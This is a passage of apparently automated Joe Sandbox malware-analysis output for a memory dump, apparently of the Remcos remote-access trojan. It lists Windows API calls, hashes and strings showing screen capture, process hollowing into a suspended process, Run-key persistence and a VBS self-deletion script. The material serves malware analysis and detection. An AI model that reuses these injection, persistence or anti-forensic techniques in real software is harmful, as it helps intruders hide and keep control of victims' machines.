                                                                                                        • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                                        • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                        • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                        • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1084509184-0
                                                                                                        • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                        • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                        • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                        • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                        APIs
                                                                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                        • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @
                                                                                                        • API String ID: 0-2766056989
                                                                                                        • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                        • Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
                                                                                                        • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                        • Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                                                        • Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
                                                                                                        • Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                                                        • Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                                                        • Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
                                                                                                        • Opcode Fuzzy Hash: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                                                        • Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                                                        • Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
                                                                                                        • Opcode Fuzzy Hash: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                                                        • Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                                                        • Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
                                                                                                        • Opcode Fuzzy Hash: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                                                        • Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                        • Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
                                                                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                        • Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                        • Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
                                                                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                        • Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                        • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                        • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                        • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                        • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                        • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                                                                                        • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                        • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                                                        • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                                                                                        • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                                                        • Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                                                        • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                                                                                        • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                                                        • Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                        • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                                                                                        • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                        • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                        • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                                                                                        • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                        • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                                                        • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                                                                                        • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                                                        • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
                                                                                                        APIs
                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                          • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                        • GetIconInfo.USER32 ref: 00418FF8
                                                                                                        • DeleteObject.GDI32(?), ref: 00419027
                                                                                                        • DeleteObject.GDI32(?), ref: 00419034
                                                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                        • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                        • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                        • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                        • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                        • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                        • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                        • DeleteDC.GDI32(?), ref: 00419293
                                                                                                        • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                                        • String ID: DISPLAY
                                                                                                        • API String ID: 479521175-865373369
                                                                                                        • Opcode ID: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                                                                        • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                                        • Opcode Fuzzy Hash: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                                                                        • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                        • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                        • WriteProcessMemory.KERNEL32 ref: 00418446
                                                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                        • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                        • GetLastError.KERNEL32 ref: 004184B5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                        • API String ID: 4188446516-3035715614
                                                                                                        • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                        • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                                        • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                        • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                          • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                          • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                        • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                        • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                        • API String ID: 1861856835-1447701601
                                                                                                        • Opcode ID: 5d2ec2f2100dd23cc365e5a044f7fac0ce6a70abfbf1c55e622674ec0d54512f
                                                                                                        • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                                        • Opcode Fuzzy Hash: 5d2ec2f2100dd23cc365e5a044f7fac0ce6a70abfbf1c55e622674ec0d54512f
                                                                                                        • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                          • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63A01986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                        • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                                        • API String ID: 3797177996-2483056239
                                                                                                        • Opcode ID: 2ee98ea0d0f3863be26643997f5fff8c6a28cb97601397e967d1afa7fe61d675
